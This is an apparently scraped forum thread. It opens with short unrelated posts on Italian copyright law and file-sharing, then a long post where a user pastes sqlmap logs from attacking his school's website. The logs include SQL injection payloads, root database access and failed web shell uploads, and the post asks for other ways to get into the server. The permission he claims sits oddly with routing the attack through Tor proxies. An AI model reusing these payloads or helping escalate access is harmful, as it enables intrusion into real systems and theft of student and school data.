What country is that? Maybe I'll move there for a few weeks, downloading every thing I can get my hands on, and then fly back to the States. 

It's Italy

It is worth pointing out that in Italy anyone the ability to download a work protected by copyright and puts it into sharing commits a criminal offense (it is the art. 171, letter. A-bis, LDA). The rule is very clear: it punishes anyone who does it "without having the right, for any purpose and in any form"

are you sure that your target is vulnerable to your exploit?? you should know that many times the bug you pretend to use is just patched..

Seriously?? can i ask where are you from??.. because in my country is not against the law, any type of p2p downloading, but is punished with 4 year in jail the redistribution of downloaded medias... but only if i take money for that, im totaly free to share with my friends my downloads, as a long i dont take money for that

Hello there
my school website got a mysql db, i've found multiple vulnerabilities in it with mysql.
i've asked our teacher(the webmaster) if i could practice some security test.


i've found multiple vulnerabilities in the database, i've also cracked the admin password, but i've got a doubt that i will explain at your much experienced eyes, so im front of this scenario:


[*] starting at 13:06:17


[13:06:18] [INFO] resuming back-end DBMS 'mysql'
[13:06:18] [INFO] testing connection to the target URL
|S-chain|-<>-127.0.0.1:9050-<><>-*.*.*.*:80-<><>-OK
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:06:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:06:21] [INFO] fetching current user
current user:    'root@localhost'
[13:06:21] [INFO] testing if current user is DBA
[13:06:21] [INFO] fetching current user
current user is DBA:    True
[13:06:21] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/


[*] shutting down at 13:06:21


so the user is root and ofc, i have DBA permissions but when i try to switch --os-shell i got this:





s0uthboy@GLaDOS2:~$ sudo proxychains /opt/backbox/sqlmap/sqlmap.py -u "http://www.schoolsite.it/index2.php?id=" --os-shell
ProxyChains-3.1 (http://proxychains.sf.net)


    sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
    http://sqlmap.org


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 13:10:15


[13:10:16] [INFO] resuming back-end DBMS 'mysql'
[13:10:16] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a786b793a,0x696e4f6a646e68504971,0x3a71666d3a),NULL#


    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=' AND 3502=BENCHMARK(5000000,MD5(0x48537954)) AND 'dqVz'='dqVz
---
[13:10:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:10:19] [INFO] going to use a web backdoor for command prompt
[13:10:19] [INFO] fingerprinting the back-end DBMS operating system
[13:10:19] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[13:10:21] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search


> 2
please provide the web server document root: /var/www/school/docs/
[13:12:24] [WARNING] unable to retrieve automatically any web server path
[13:12:24] [INFO] trying to upload the file stager on '/var/www/school/docs' via LIMIT INTO OUTFILE technique
[13:12:25] [WARNING] reflective value(s) found and filtering out
[13:12:26] [WARNING] unable to upload the file stager on '/var/www/school/docs'
[13:12:26] [INFO] trying to upload the file stager on '/var/www/school/docs' via UNION technique
[13:12:27] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:12:29] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[13:12:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[13:12:30] [INFO] fetched data logged to text files under


[*] shutting down at 13:12:30



same errors with --os-cmd and --os-pwn, i've also made some tests using --sql-shell into outfile technique, but nothing.
 
thats it, i need to know if there is another way to upload something, without using the admin panel on the website, or if there is another way to get into the server.


Thanks for your attention